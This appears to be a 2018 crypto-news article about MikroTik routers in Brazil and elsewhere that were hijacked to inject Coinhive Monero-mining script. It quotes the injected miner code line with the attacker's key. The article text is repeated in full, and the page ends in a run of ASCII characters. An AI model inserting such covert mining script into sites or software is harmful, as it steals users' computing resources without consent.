Crypto-Jacking Scheme Discovered in Brazil Could Spread Worldwide

Sunday, 05/08/2018 | 13:34 GMT by Simon Golstein
  • There are 70,000 infected routers in Brazil and 170,820 worldwide.
Crypto-Jacking Scheme Discovered in Brazil Could Spread Worldwide
Pixabay

Tens of thousands of internet routers across Brazil have been programmed to mine Monero for crypto-jackers, according to a Chicago-based IT security company called Trustwave.

Preciso de ajuda

Simon Kenin, a security researcher at the company, noticed at the end of July that MikroTik-brand internet routers in Brazil were showing a big surge in use of a programme called Coinhive.

Coinhive is software which allows a user to mine a cryptocurrency called Monero. It can be integrated into a website, and has legitimate uses - for example, for charity websites to raise money - but it has also become a popular tool for hackers. They surreptitiously install it into other peoples' computers and wait for the money to roll in.

MikroTik is a Latvian company that produces internet Connectivity hardware/software. There are more than 70,000 of the company's routers in use in Brazil, according to the report.

Kenin investigated and found that all of the iterations of Coinhive were using the same key, meaning that all of the mining rewards were being sent to one account. He even found a hospital that was mining money for the hackers.

He then found this post online:

Source: Reddit

Translation:

I need help: A coin-mining script is manipulating links that I click

Hello r/InternetBrasil, I started to have this problem in my network a little while ago (it happens on the PC and on the cell phone). I changed DNS, disconnected the router and connected directly to the modem, but it did not work.

This is the script that loads:

var miner = new CoinHive.Anonymous ('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2}); miner.start ();

170,820 routers, millions of users

The user then posted that the problem went away on its own - it was the router of the internet service provider (which he shared with the aforementioned hospital) that was infected.

This scam targets a vulnerability in the MikroTik router which allows unauthenticated remote access. MikroTik patched the problem on routers that reported it, but Kenin warns that this could be the beginnings of a major attack; no fewer than 170,820 routers are currently embedded with the suspicious Coinhive key already.

Said Kenin: "Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices."

"There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily."

Kenin also observed that the hacker's code was being modified as he was investigating, indicating that the perpetrators are improving their work as they go along.

Other Monero hacks

In January, 15 million people across South America, Southeast Asia, and North Africa were hit with a Cryptojacking virus which was hidden within advertisements. In May, reports surfaced of a crypto-jacking virus that shuts down the host computer when it is confronted with an anti-virus, and in July, a man was jailed for year in Japan because of his crypto-jacking scheme.

Tens of thousands of internet routers across Brazil have been programmed to mine Monero for crypto-jackers, according to a Chicago-based IT security company called Trustwave.

Preciso de ajuda

Simon Kenin, a security researcher at the company, noticed at the end of July that MikroTik-brand internet routers in Brazil were showing a big surge in use of a programme called Coinhive.

Coinhive is software which allows a user to mine a cryptocurrency called Monero. It can be integrated into a website, and has legitimate uses - for example, for charity websites to raise money - but it has also become a popular tool for hackers. They surreptitiously install it into other peoples' computers and wait for the money to roll in.

MikroTik is a Latvian company that produces internet Connectivity hardware/software. There are more than 70,000 of the company's routers in use in Brazil, according to the report.

Kenin investigated and found that all of the iterations of Coinhive were using the same key, meaning that all of the mining rewards were being sent to one account. He even found a hospital that was mining money for the hackers.

He then found this post online:

Source: Reddit

Translation:

I need help: A coin-mining script is manipulating links that I click

Hello r/InternetBrasil, I started to have this problem in my network a little while ago (it happens on the PC and on the cell phone). I changed DNS, disconnected the router and connected directly to the modem, but it did not work.

This is the script that loads:

var miner = new CoinHive.Anonymous ('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2}); miner.start ();

170,820 routers, millions of users

The user then posted that the problem went away on its own - it was the router of the internet service provider (which he shared with the aforementioned hospital) that was infected.

This scam targets a vulnerability in the MikroTik router which allows unauthenticated remote access. MikroTik patched the problem on routers that reported it, but Kenin warns that this could be the beginnings of a major attack; no fewer than 170,820 routers are currently embedded with the suspicious Coinhive key already.

Said Kenin: "Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices."

"There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily."

Kenin also observed that the hacker's code was being modified as he was investigating, indicating that the perpetrators are improving their work as they go along.

Other Monero hacks

In January, 15 million people across South America, Southeast Asia, and North Africa were hit with a Cryptojacking virus which was hidden within advertisements. In May, reports surfaced of a crypto-jacking virus that shuts down the host computer when it is confronted with an anti-virus, and in July, a man was jailed for year in Japan because of his crypto-jacking scheme.

About the Author: Simon Golstein
Simon Golstein
  • 780 Articles
  • 16 Followers
About the Author: Simon Golstein
  • 780 Articles
  • 16 Followers

More from the Author

CryptoCurrency

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|} !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}